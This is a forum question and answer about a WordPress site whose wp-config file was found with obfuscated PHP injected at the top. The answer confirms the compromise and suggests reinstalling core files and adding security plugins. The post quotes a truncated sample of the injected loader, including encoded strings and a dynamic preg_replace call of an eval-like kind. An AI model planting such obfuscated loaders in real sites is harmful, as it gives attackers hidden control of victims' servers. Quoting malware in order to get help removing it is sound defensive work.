I hadn’t realized that one of my WP sites wasn’t being accessed in the last months, and consequently not being updated, and today I have found that my config.php has some garbage in the beginning of the file:
<?php $uqnrguvics="x7825r% ... more garbage ...
825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3/(.*)/epreg_replacezrxmuexghf";
$uvozcxjtxg = explode(chr((253-209)),'4137,25,2713,60,8524,67 ... more garbage ...
'); $tuyrkvuamr=substr($uqnrguvics,(49619-39513),(27-20));
if (!function_exists('zpjgeglbtt')) { function zpjgeglbtt($lwtbhpepkn, $lkvuvnwcsu) {
$sblzyeefjv = NULL; for($mxodybdogx=0;$mxodybdogx<(sizeof($lwtbhpepkn)/2);$mxodybdogx++)
{ $sblzyeefjv .= substr($lkvuvnwcsu, $lwtbhpepkn[($mxodybdogx*2)],
$lwtbhpepkn[($mxodybdogx*2)+1]); }
return $sblzyeefjv; };} $rudmfyfhqb="\ x20\57... hex garbage ... \52\x2f\40";
$vkyezvmvec=substr($uqnrguvics,(42452-32339),(65-53));
$vkyezvmvec($tuyrkvuamr, $rudmfyfhqb, NULL); $vkyezvmvec=$rudmfyfhqb;
$vkyezvmvec=(811-690); $uqnrguvics=$vkyezvmvec-1; ?>
<?php
HERE comes an usual wp-config.php, which as far as I remember is the one I had before
The file also has DOS encoding, although I’m running it on Linux.
(I have included line breaks).
Does this mean this installation has been compromised? Or is this something automatically included by WP somehow?
If it was, is it enough to just change the admin password? Logging in as admin doesn’t show anything unusual.
1 Answer
Yes, it appears so. In my experience the best thing to do is re-upload a fresh WordPress core to ensure that all traces have been squashed.
It happens… If you aren’t already using security plugins I’d recommend Wordfence and BruteProtect to help keep brute force attacks out as well as checking your core WordPress files for changes.
